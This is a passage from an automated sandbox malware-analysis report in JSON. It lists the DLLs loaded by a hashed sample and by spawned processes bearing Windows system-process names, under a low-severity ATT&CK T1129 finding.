6a260000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73f80000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005912)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005904)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00005904)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004200)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006100)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006100)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006100)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006100)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006100)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006100)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006036)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006036)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002312)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006120)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004424)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004424)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004416)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004416)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004416)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004416)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004416)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004416)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004416)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004416)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003524)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003524)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003524)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003524)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003524)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003524)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003524)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004420)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004420)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004420)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004420)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004420)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003476)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001748)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001748)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002684)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002684)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002656)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002656)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001856)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001856)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001176)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001176)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001176)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001176)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001176)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001176)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003904)\n \"SMSS.EXE\" called \"LoadLibrary\" with a 